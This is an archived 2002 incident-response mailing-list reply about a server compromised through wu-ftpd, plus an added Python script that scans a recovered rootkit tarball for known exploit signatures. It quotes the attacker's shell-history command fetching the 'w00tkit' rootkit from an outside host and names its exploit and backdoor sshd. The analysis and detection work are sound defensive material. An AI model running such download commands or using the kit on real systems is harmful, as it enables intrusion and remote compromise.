On Wed, Sep 11, 2002 at 08:15:42PM -0700, Ver Allan Sumabat wrote:
> 21 - wu-ftpd-2.6.1-20
> 22 - openssh-3.1
> 443 - tomcat-3.2.4
>
> 1. this is the content of /home/war's .bash_history:
>
> wget http://mrunix.free.fr/roy/w00tkit.tgz

There we go. Getting the kit and grepping through the binaries reveals:

7350wurm:^@^@^@^@7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
wus:^@2.6.0^@aw+^@wus.log^@^@^@wu-scan by yonezet (yonezetat_private)

Since the attackers probably used the same rootkit to crack your machine, wuftpd was the target. (No ssh exploit in the w00tkit package, afaics; but it seems to open another ssh at port 2006.)

Also, the tgz even contains a core file:

core: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from 'pstree'

The core file points out that the machine (which threw the core, not yours) had several processes running, including various bouncers (IRC proxies), at least one eggdrop (IRC bot) and various scan programs.

Another fact is that the other sshd (2006) has a static sshd_random_seed file. I wonder if one can use that to fingerprint hacked machines.

I did only a fast grep over the files, though, so one might find more interesting things.

-rico

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Sep 13 2002 - 11:26:40 PDT
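The triage rico describes (pull the printable strings out of each binary in the kit and look for tell-tale names) can be scripted so an incident handler can run it over any recovered archive without extracting it to disk. The following is an added example and not code from the post or the list; the signature strings come from the post itself, while the in-memory tarball it scans is constructed for the demo and is not the real w00tkit.

```python
"""Triage a recovered toolkit tarball by extracting printable strings
from each member (like strings(1)) and matching them against known
tool signatures.

Added example, not the original post's code.  The signature strings
below are the ones quoted in the post; the sample archive built in
build_sample_tarball() is constructed for this demo."""
from __future__ import annotations

import io
import re
import tarfile

MIN_LEN = 6  # same default as strings(1) minus a little noise

# Signatures taken from the post; a handler would extend this from
# their own IOC notes.  Value is a human-readable description.
SIGNATURES = {
    "7350wurm": "wu-ftpd <= 2.6.1 remote root exploit",
    "wu-scan": "wu-ftpd scanner",
    "sshd_random_seed": "bundled sshd (possible backdoor daemon)",
}


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Return every run of at least min_len printable ASCII bytes."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def match_signatures(found: list[str], signatures=SIGNATURES) -> dict[str, str]:
    """Map each signature seen in any extracted string to its description."""
    hits: dict[str, str] = {}
    for s in found:
        for sig, desc in signatures.items():
            if sig in s:
                hits.setdefault(sig, desc)
    return hits


def triage_tarball(blob: bytes) -> dict[str, dict[str, str]]:
    """Scan every regular file in a (possibly compressed) tarball held in
    memory; return {member name: {signature: description}} for members
    that matched at least one signature."""
    report: dict[str, dict[str, str]] = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            fh = tar.extractfile(member)
            if fh is None:
                continue
            hits = match_signatures(extract_strings(fh.read()))
            if hits:
                report[member.name] = hits
    return report


def build_sample_tarball() -> bytes:
    """Constructed sample: fake 'binaries' carrying the strings rico
    quoted, plus one harmless text file that should not match."""
    members = {
        "w00tkit/7350wurm": (
            b"\x7fELF\x00\x00\x00\x00"
            b"7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)\x00"
        ),
        "w00tkit/wus": (
            b"\x7fELF\x00\x002.6.0\x00aw+\x00wus.log\x00\x00\x00"
            b"wu-scan by yonezet\x00"
        ),
        "w00tkit/README": b"just some text\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    # Replace build_sample_tarball() with open("kit.tgz", "rb").read()
    # to run this over a real recovered archive.
    for name, hits in triage_tarball(build_sample_tarball()).items():
        for sig, desc in hits.items():
            print(f"{name}: {sig} -> {desc}")
```

Because the archive is read through a BytesIO and never unpacked, nothing from the kit is written to the analysis host; the README member is scanned but produces no entry, which is the behaviour you want from a signature pass.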